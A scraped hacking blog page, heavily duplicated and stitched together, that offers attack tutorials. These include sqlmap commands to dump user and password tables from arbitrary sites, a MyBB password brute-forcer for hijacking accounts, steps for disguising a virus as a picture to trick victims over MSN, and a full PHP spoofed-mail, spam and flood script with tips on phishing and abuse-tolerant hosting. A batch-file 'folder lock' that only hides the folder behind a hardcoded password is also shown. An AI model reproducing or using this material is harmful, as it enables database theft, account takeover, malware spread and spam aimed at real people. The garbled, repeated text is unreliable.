Code:
python.py sqlmap -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere -T TableNameHere --columns
This will then gather all the columns form that table

You should be able to see a list of columns, yet again you need to look out for something like users,pwd,passwords,members,admin, you will then need to type this code in

Code:
python.py sqlmap -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere -T allowed -c columnName --dump







You will then get the information that you wanted,
Thanks for reading, I really hope this tutorial has helped you Black Hat
Note: SqlMap and backtrack overall does leave logs, so watch out for what sites you try and hack

Website Hacking: SQL Injection With Backtrack 5

Posted at  7:50 PM - by devil 0

         Website Hacking: SQL Injection With Backtrack 5


To start off I would like to explain what SQL Injection Attack are,

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
(www.http://en.wikipedia.org)

I would also like to add that, I dont use Backtrack to perform SQL injection attacks, but I know how to, so I figured I would put a tutorial up on it.

Ok to start off you are going to need Backtrack, here is a video tutorial on installing it
Installing Backtrack 5 on Windows

Once installed you will need to navigate to
Exploitation Tools > Web Exploitation Tools > sqlmap
Once clicked a console like window will appear you will then need to type the following code

Code:
python.py -u http://sitename.com/dorkhere?id=32 --dbs
This code will make backtrack scan your site

Once done you should see multiple database names, you will then need to type

Code:
python.py -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere --Tables
This will then collect the tables from that database, once done you should have a list of all the tables from that database, you should try and choose a table that is something like users,pwd,passwords,members,admin, you will now need to type this code in

Code:
python.py sqlmap -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere -T TableNameHere --columns
This will then gather all the columns form that table

You should be able to see a list of columns, yet again you need to look out for something like users,pwd,passwords,members,admin, you will then need to type this code in

Code:
python.py sqlmap -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere -T allowed -c columnName --dump







You will then get the information that you wanted,
Thanks for reading, I really hope this tutorial has helped you Black Hat
Note: SqlMap and backtrack overall does leave logs, so watch out for what sites you try and hack

0 comments:

Password Protect Any Folder Without Any Software
In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace coolhacks with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

Password Protect Any Folder Without Any Software

Posted at  7:49 AM - by devil 0

Password Protect Any Folder Without Any Software
In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace coolhacks with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

0 comments:

Password Protect Any Folder Without Any Software
In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace coolhacks with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

Password Protect Any Folder Without Any Software

Posted at  7:48 AM - by devil 1

Password Protect Any Folder Without Any Software
In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace coolhacks with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

1 comments:

Advanced Google Hacking




Google hacking, most commonly misunderstood words by newbies as making queries on Google search to find out songs and movies. Google hacking is term given to create and use complex queries on search box to get expected results from Google. But in reality it includes using each and every tool that is provided by Google as hacking weapon. So lets start with google hacking ;)
————————————————————————————-

1. Link :: This query searches for all links that ends to site mentioned after query.
Syntax : link:“www.starthack.com”
————————————————————————————-

2. Inurl :: This query will search occurrences of word specified in URL ‘s.
Syntax : inurl:“starthack”
————————————————————————————-

3. Site :: This query is used if you want to search result from some particular website through Google.
Syntax : site:starthack.com
————————————————————————————-

4. Intitle :: This query will search occurrences of word specified in title or website.
Syntax : intitle:”starthack”
————————————————————————————-

5. FileType :: This query will search occurrences of filetype specified.
Syntax : filetype:ppt “Google hacking”
————————————————————————————-

6. Directories And Files Listing :: Apache server by default uses “Index of ” type title to transverse navigation which can be exploited using Google queries to get specific file or folder.
Syntax : intitle:index.of “songs”
————————————————————————————-

7. Related :: This query will search web pages for the word specified after related. This will show similar results to your query..
Syntax : related:paul allen
————————————————————————————-

8. Define :: This query not only brings you definition and dictionary meaning of word but can also reveal you information about victims company. Try following query.
Syntax : define:microsoft
————————————————————————————-

9. Info :: This query is used to reveal history geography of word typed after it.
Try following queries,
info:starthack team
info:microsoft
info:google
————————————————————————————-

10 Intext :: This will search every occurrence of word typed after it, it will not only search URL
and title but also the text in body. Try this,
intext: google hacking
intext: start hack
————————————————————————————-

11. links :: This will search links to the URL that you will specify after it. Try following queries,
links:starthack.com
links:google.com

Advanced Google Hacking

Posted at  4:30 AM - by devil 2

Advanced Google Hacking




Google hacking, most commonly misunderstood words by newbies as making queries on Google search to find out songs and movies. Google hacking is term given to create and use complex queries on search box to get expected results from Google. But in reality it includes using each and every tool that is provided by Google as hacking weapon. So lets start with google hacking ;)
————————————————————————————-

1. Link :: This query searches for all links that ends to site mentioned after query.
Syntax : link:“www.starthack.com”
————————————————————————————-

2. Inurl :: This query will search occurrences of word specified in URL ‘s.
Syntax : inurl:“starthack”
————————————————————————————-

3. Site :: This query is used if you want to search result from some particular website through Google.
Syntax : site:starthack.com
————————————————————————————-

4. Intitle :: This query will search occurrences of word specified in title or website.
Syntax : intitle:”starthack”
————————————————————————————-

5. FileType :: This query will search occurrences of filetype specified.
Syntax : filetype:ppt “Google hacking”
————————————————————————————-

6. Directories And Files Listing :: Apache server by default uses “Index of ” type title to transverse navigation which can be exploited using Google queries to get specific file or folder.
Syntax : intitle:index.of “songs”
————————————————————————————-

7. Related :: This query will search web pages for the word specified after related. This will show similar results to your query..
Syntax : related:paul allen
————————————————————————————-

8. Define :: This query not only brings you definition and dictionary meaning of word but can also reveal you information about victims company. Try following query.
Syntax : define:microsoft
————————————————————————————-

9. Info :: This query is used to reveal history geography of word typed after it.
Try following queries,
info:starthack team
info:microsoft
info:google
————————————————————————————-

10 Intext :: This will search every occurrence of word typed after it, it will not only search URL
and title but also the text in body. Try this,
intext: google hacking
intext: start hack
————————————————————————————-

11. links :: This will search links to the URL that you will specify after it. Try following queries,
links:starthack.com
links:google.com

2 comments:

 
Hack MyBB accounts using Arcaneyon's MyBB BruteForcer.
( POWERED BY WWW.HOODEDJUSTICE.ME )


[Image: 4q8RX.png]

Too lazy to make the thread look good.

Just put the MyBB forum link in FORUMNAME.COM format, without HTTP:\\www. and the Username of the account you wish to hijack in the right boxes.

Click "Import List" to import a password list.

Press Start and the program checks all the passwords against the given username.

It is multi-threaded so it shouldn't hang/fuck up.

Works only for MyBB forums without login captcha and no alterations.

I've also added two giant password lists in the RAR file.

NOTE: Will not work on HF, don't bother trying.

Download: http://www.mediafire.com/download/lwqx2o...ice.me.rar
Virus Scan: VirusTotal.

WARNING: This program is meant only for educational purposes, I cannot be held liable for your actions.

How to hack MyBB accounts using Arcaneyon's MyBB BruteForcer.

Posted at  4:15 AM - by devil 1

 
Hack MyBB accounts using Arcaneyon's MyBB BruteForcer.
( POWERED BY WWW.HOODEDJUSTICE.ME )


[Image: 4q8RX.png]

Too lazy to make the thread look good.

Just put the MyBB forum link in FORUMNAME.COM format, without HTTP:\\www. and the Username of the account you wish to hijack in the right boxes.

Click "Import List" to import a password list.

Press Start and the program checks all the passwords against the given username.

It is multi-threaded so it shouldn't hang/fuck up.

Works only for MyBB forums without login captcha and no alterations.

I've also added two giant password lists in the RAR file.

NOTE: Will not work on HF, don't bother trying.

Download: http://www.mediafire.com/download/lwqx2o...ice.me.rar
Virus Scan: VirusTotal.

WARNING: This program is meant only for educational purposes, I cannot be held liable for your actions.

1 comments:


Hide any file inside a picture


Items Needed:
  • Any Icon Changer
  • A Binder
  • A Brain

1) Create your virus. We shall call it 'server1.exe' for now.

[Image: server1.png]

2) Get any picture file you want to distribute.

3) Bind the 'server1.exe' and your picture file with any binder, we'll call the binded file 'virus1.exe'.

[Image: bindere.th.png]

3.5) I reccomend Easy Binder 2.0, which comes with a bytes adder and a icon extractor, aswell as some really good packing options. I've uploaded it, virus free, to: http://www.mediafire.com/?igjy4dnn0zb
< This will be caught by your AV as "Binder/Kit". It is not a virus, it is a binder than is not undectable. If you don't wish to use it, that's fine, find your own.

4) Be sure you have 'Hide common extensions' unchecked in your Folder Options.

[Image: known.th.png]

5) Change the 'virus1.exe' to '%Picturename%.jpeg - %Email/Web Address%.com'. For example, we'll call it 'HPIC_119.jpeg - test@test.com'.

[Image: hpic.th.png]

.com works the same as .exe, except fewer people actually know that's what it really is.

6) If you plan on distributing your virus via MSN, please skip to 7. If you plan on distributing your virus via file upload sites, please skip to 8.

6.5) I reccomend Icon Extractor V3.8 FULL with Serial, that can be downloaded from this thread: http://www.hackforums.net/showthread.php?tid=232221

[Image: iconchange.th.png]

7) You will now need to change the icon from that ugly box. Find the picture you added to the file, and make it an icon. How? Find one of the various online Picture to Icon converters. Once your picture is a .ico, use your Icon Changer program to change the icon of the file to the .ico you just made from the picture. When you send it to people on MSN, it will show a small box of the picture inside.

[Image: msnz.th.png]

8) You will not need to change the icon from that ugly box. Using your Icon Changer program, find the .jpeg icon, and change the ugly box to the .jpeg icon.

[Image: downloadfq.th.png]

9) Conclusion. Your file will now look like a legit picture to 9/10 people. Some people do know that .com is an extension, but the average computer user will not see any difference, and will download it without hesitation.

How To Hide your Virus in a Picture File

Posted at  4:11 AM - by devil 0


Hide any file inside a picture


Items Needed:
  • Any Icon Changer
  • A Binder
  • A Brain

1) Create your virus. We shall call it 'server1.exe' for now.

[Image: server1.png]

2) Get any picture file you want to distribute.

3) Bind the 'server1.exe' and your picture file with any binder, we'll call the binded file 'virus1.exe'.

[Image: bindere.th.png]

3.5) I reccomend Easy Binder 2.0, which comes with a bytes adder and a icon extractor, aswell as some really good packing options. I've uploaded it, virus free, to: http://www.mediafire.com/?igjy4dnn0zb
< This will be caught by your AV as "Binder/Kit". It is not a virus, it is a binder than is not undectable. If you don't wish to use it, that's fine, find your own.

4) Be sure you have 'Hide common extensions' unchecked in your Folder Options.

[Image: known.th.png]

5) Change the 'virus1.exe' to '%Picturename%.jpeg - %Email/Web Address%.com'. For example, we'll call it 'HPIC_119.jpeg - test@test.com'.

[Image: hpic.th.png]

.com works the same as .exe, except fewer people actually know that's what it really is.

6) If you plan on distributing your virus via MSN, please skip to 7. If you plan on distributing your virus via file upload sites, please skip to 8.

6.5) I reccomend Icon Extractor V3.8 FULL with Serial, that can be downloaded from this thread: http://www.hackforums.net/showthread.php?tid=232221

[Image: iconchange.th.png]

7) You will now need to change the icon from that ugly box. Find the picture you added to the file, and make it an icon. How? Find one of the various online Picture to Icon converters. Once your picture is a .ico, use your Icon Changer program to change the icon of the file to the .ico you just made from the picture. When you send it to people on MSN, it will show a small box of the picture inside.

[Image: msnz.th.png]

8) You will not need to change the icon from that ugly box. Using your Icon Changer program, find the .jpeg icon, and change the ugly box to the .jpeg icon.

[Image: downloadfq.th.png]

9) Conclusion. Your file will now look like a legit picture to 9/10 people. Some people do know that .com is an extension, but the average computer user will not see any difference, and will download it without hesitation.

0 comments:

How to Easy Setup your own Anonymous Email (or Fake Email) Service !


What is anonymous email (or fake email)


Anonymous email, often referred to as prank email (or fake email), allows the user to send an email without disclosing their identity. The system uses a simple input form on a web page. Information is entered filling out the elements of a real email. Sender's and recipient's email addresses, subject and message body are usually the minimum required fields. Clicking on the send or submit button activates a script formats the information and then sends out the bogus text with the system mail utility. The recipient opens a real looking email from the fake address and reads the prank content. Prank email's primary purpose involves playing practical jokes on acquaintances. Some services offer canned pranks like a payment notification from an online adult "novelty" store with an itemized order confirmation. Most pranksters like to write their own situation specific pranks. The service can also be used to anonymously pass information. Beware, Internet forensics mean that only casual end users will be fooled. This is not the method of choice for agents of international intrigue, smugglers, or mercenaries. Savvy users who check their mail headers won't be fooled by prank email. Those using prank email for illegal purposes will discover that the anonymous service will turn over their router and server logs rather than be liable. In other words, recreational use only.

Method #1

What you will need

1) Host with PHP and Sendmail support
(for example FREE hosting x10hosting.com was tested and works nice without ads,
byethost5.com works fine but adds to messages annoying ads).
...or find another

2) PHP script by NOmeR1 "Sender Anonym Email :: FLoodeR :: SpameR"
(script was taken from Antichat.ru)

PHP Code:
<? /*
(C) NOmeR1
*/ 
?>
<title>Sender Anonym Email :: FLoodeR :: SpameR</title>
<? // error_reporting (0);
if(!
set_time_limit(0)) { $limit false;
} else { 
set_time_limit(0); ignore_user_abort(1); $limit true;
}
$log 'log.txt'// Log file
ini_set('max_execution_time''0');
?>
set_time_limit(0) = <?if($limit)echo('<font color=Green>On</font>');else
echo(
'<font color=Red>Off</font> (Working time is limited with the current settings of the server)');?><br>
<?

$ip 
getenv('REMOTE_ADDR');
if(
$_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3')
{
$_POST['to'] = stripslashes($_POST['to']); $_POST['msg'] = stripslashes($_POST['msg']); $_POST['from'] = stripslashes($_POST['from']); $_POST['subject'] = stripslashes($_POST['subject']);

if(
$_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe'])
$headers "MIME-Version: 1.0\r\n"$headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251\r\n"$headers .= "From: ".$_POST['from']."\n";
if(
$_GET['mail'] == '1')
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
}
elseif(
$_GET['mail'] == '2')
$_POST['to'] = explode("\n",$_POST['to']);
foreach(
$_POST['to'] as $poluchatels)
mail($poluchatels$_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
}
}
elseif(
$_GET['mail'] == '3')
{
if(
preg_match('/[0-9]+/',$_POST['kol']))
{
for(
$i=0;$i<$_POST['kol'];$i++)
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message'); sleep(1);
}
}
else
{
echo(
'Incorrect (or not entered) number of messages');
}
$f fopen($log,'a'); fwrite($f,'Message sent &'.$_POST['msg'].'& with subject "'.$_POST['subject'].'" for "'.$_POST['to'].'" from IP - "'.$ip."\"\r\n"); fclose($f);
echo(
'<center><b><font color="green">Message succesfully sent</font></b></center>');
}
else
?>
<form style="width:350px" method='post'>
<? if($_GET['mail'] == '1' || $_GET['mail'] == '3')
{
echo(
"Receiver &nbsp;<input type='text'name='to'><br>");
?>
Sender <input type='text' name='from'><br>
Subject &nbsp;<input type='text' name='subject'><br>
<? if($_GET['mail'] == '3')
{
echo(
"Amount of messages <input type='text' name='kol'><br>");
?>
<br>
htm -> <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> :: <input type='radio' name='tipe' value='plain'><- text<br>
<? if($_GET['mail'] == '2')
{
echo(
"Receivers<br><textarea name='to' rows='10' cols='30'>admin@fbi.org
admin@cia.org
admin@whitehouse.org</textarea>"
);
?>
<br>Message<br>
<textarea name='msg' rows='10' cols='30'></textarea><br><br><input type='submit'>
</form>
<? }
} else { 
?><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Send simple message</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Spam</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Flood</a><br>
<? ?>

Installation
It's very easy. Just save the script above as mail.php and copy it to the server (via FTP or cPanel's File Manager) into your public_html dir and begin to send mails. Type in your browser for example <your_subdomain_name>.x10.bz/<yourfile.php>

[Image: b0662289.jpg]


Screen


[Image: 214834c5.jpg]

Method #2


What you will need

1) Host with PHP and Sendmail support (for example x10hosting.com).
2) AJAX project email.rl6.ru (Anonymous Mail).
(Source code was taken from http://email.rl6.ru, Author of project: sterx@rl6.ru with support LiveDev Group, GPL license)

Features of the project

- Using UTF8 (you can use any characters in your messages)
- Using HTML и TXT/plain formats
- You can send letters with any return address
- Supports attachments
- Using AJAX without page reloading

Installation
It's very easy. Just decompress and copy files to the server (via FTP or cPanel's File Manager) and begin to send messages.

Screen


[Image: 9728a94c.jpg]

Download:

HFthebest

Method #3


What you will need

1) Host with PHP and Sendmail support
2) Dark-Mailer V.2.2 © by p0LYM0rPH2012 and ZyphoMud DarkenedCore Admin Team

Features of the project

- Anonymous mailing
- Spam massmailing
- Mail grabber alpha-version
- Using HTML и TXT/plain formats
- Supports attachments

Installation
Copy file Dark-Mailer V.2.2.htm (better rename it) to the server (via FTP or cPanel's File Manager) and begin to send messages.

Screen


[Image: b20fd886.jpg]

How to use

Simply fill out the form and press the "Send"-Button. You can attach a file, which will be uploaded to the server, encoded for the Email and then be deleted from the server(If PHP Safe-Mode is not active). If you wish, you can spam around by inserting a lot of Email-Adresses and let the script pass through this list about 1000 times ;). The PHP execution time depends if Safe-Mode's on! If you type "{email}" in the "Subject" or "Message" field the script will exchange it with the Email-Adresse you typed in the "Your Email" field. You can set the Email to a plain text Email or a HTML-Email (with or without parsing BBCodes)...good for Phishers ;)
Supported BBCode Tags:
Quote:b,i,u,center,img,url,red,blue,yellow,color,size,quote,quote=
Now you can try out the new E-Mail Grabber. Type an URL and the Grabber will search for E-Mails on the site. The Grabber is Alpha.

Download:


Method #4


What you will need

1) The script requires host with PHP 5 support - because of the function call htmlspecialchars_decode, you need to turn "back to HTML" received from TinyMCE data. Of course, writing your analogue of this function, can use the script and the previous versions of PHP. The file "time" should be writable.
2) PHPMailer script.
Source code was taken from http://Pers.narod.ru and translated from Russian to English

Features of the project

Presented script, in fact, is simply "cheat" over a similar function call mail. To write and edit messages in HTML format, it uses the excellent (about 1.5 Mb in the decompressed state) library TinyMCE, plus contains several additional features for validating input data, set limits on the time between retry, etc. This script allows you to create the message body in a WYSIWYG-editor, like an ordinary Microsoft Word, and send the letter as plain text (the switch to the right of the button "Reset"). Time to re-send, as well as restrictions on the maximum message size and the maximum length of words are set in config.php. After sending letters to the script leaves a letter in the form and allows you, after you specify the number of seconds, send again. I think it is easy to add to post.php a few lines of code to send out a letter on the list of addresses stored in a text file. This version of the script does not requires MySQL. Attaching a file to a letter in this version of the script is not available, but you can embed links to external resources, including graphics. If you want full support for attachments - add to library TinyMCE modules MCFileManager and MCImageManager, configure them and place on the host. The official website of these modules are invited to buy, but if a little try, you can find anyway.

Installation
It's very easy. Just decompress and copy files to the server (via FTP or cPanel's File Manager) and begin to send messages. To send message you must enter correct digital number.

Screen


[Image: 1ff9d93d.jpg]

Download:

HFthebest

Small advices will help you

1) If you want to send a LARGE amount spam or fake messages you will be quickly suspended or banned.
Use abuse stable hosting providers located in China!

2) Always scramble the php scripts
[TuT] How to make your PHP Scripts FUD

3) Always password protect via cPanel your directory with php scrips from n00bs and script kiddies.

[Image: e4b68647.jpg]

WARNING: ALL THE INFORMATION PROVIDED IN THIS POST ARE FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR ANY MISUSE.

Please leave a comment on what you thought of these usefull scripts!
Save the energy! Switch off Caps Lock! Biggrin
I tried my best to write this tutorial!

Enjoy!

How to Easy Setup your own Anonymous Email (or Fake Email) Service

Posted at  3:59 AM - by devil 0

How to Easy Setup your own Anonymous Email (or Fake Email) Service !


What is anonymous email (or fake email)


Anonymous email, often referred to as prank email (or fake email), allows the user to send an email without disclosing their identity. The system uses a simple input form on a web page. Information is entered filling out the elements of a real email. Sender's and recipient's email addresses, subject and message body are usually the minimum required fields. Clicking on the send or submit button activates a script formats the information and then sends out the bogus text with the system mail utility. The recipient opens a real looking email from the fake address and reads the prank content. Prank email's primary purpose involves playing practical jokes on acquaintances. Some services offer canned pranks like a payment notification from an online adult "novelty" store with an itemized order confirmation. Most pranksters like to write their own situation specific pranks. The service can also be used to anonymously pass information. Beware, Internet forensics mean that only casual end users will be fooled. This is not the method of choice for agents of international intrigue, smugglers, or mercenaries. Savvy users who check their mail headers won't be fooled by prank email. Those using prank email for illegal purposes will discover that the anonymous service will turn over their router and server logs rather than be liable. In other words, recreational use only.

Method #1

What you will need

1) Host with PHP and Sendmail support
(for example FREE hosting x10hosting.com was tested and works nice without ads,
byethost5.com works fine but adds to messages annoying ads).
...or find another

2) PHP script by NOmeR1 "Sender Anonym Email :: FLoodeR :: SpameR"
(script was taken from Antichat.ru)

PHP Code:
<? /*
(C) NOmeR1
*/ 
?>
<title>Sender Anonym Email :: FLoodeR :: SpameR</title>
<? // error_reporting (0);
if(!
set_time_limit(0)) { $limit false;
} else { 
set_time_limit(0); ignore_user_abort(1); $limit true;
}
$log 'log.txt'// Log file
ini_set('max_execution_time''0');
?>
set_time_limit(0) = <?if($limit)echo('<font color=Green>On</font>');else
echo(
'<font color=Red>Off</font> (Working time is limited with the current settings of the server)');?><br>
<?

$ip 
getenv('REMOTE_ADDR');
if(
$_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3')
{
$_POST['to'] = stripslashes($_POST['to']); $_POST['msg'] = stripslashes($_POST['msg']); $_POST['from'] = stripslashes($_POST['from']); $_POST['subject'] = stripslashes($_POST['subject']);

if(
$_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe'])
$headers "MIME-Version: 1.0\r\n"$headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251\r\n"$headers .= "From: ".$_POST['from']."\n";
if(
$_GET['mail'] == '1')
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
}
elseif(
$_GET['mail'] == '2')
$_POST['to'] = explode("\n",$_POST['to']);
foreach(
$_POST['to'] as $poluchatels)
mail($poluchatels$_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
}
}
elseif(
$_GET['mail'] == '3')
{
if(
preg_match('/[0-9]+/',$_POST['kol']))
{
for(
$i=0;$i<$_POST['kol'];$i++)
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message'); sleep(1);
}
}
else
{
echo(
'Incorrect (or not entered) number of messages');
}
$f fopen($log,'a'); fwrite($f,'Message sent &'.$_POST['msg'].'& with subject "'.$_POST['subject'].'" for "'.$_POST['to'].'" from IP - "'.$ip."\"\r\n"); fclose($f);
echo(
'<center><b><font color="green">Message succesfully sent</font></b></center>');
}
else
?>
<form style="width:350px" method='post'>
<? if($_GET['mail'] == '1' || $_GET['mail'] == '3')
{
echo(
"Receiver &nbsp;<input type='text'name='to'><br>");
?>
Sender <input type='text' name='from'><br>
Subject &nbsp;<input type='text' name='subject'><br>
<? if($_GET['mail'] == '3')
{
echo(
"Amount of messages <input type='text' name='kol'><br>");
?>
<br>
htm -> <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> :: <input type='radio' name='tipe' value='plain'><- text<br>
<? if($_GET['mail'] == '2')
{
echo(
"Receivers<br><textarea name='to' rows='10' cols='30'>admin@fbi.org
admin@cia.org
admin@whitehouse.org</textarea>"
);
?>
<br>Message<br>
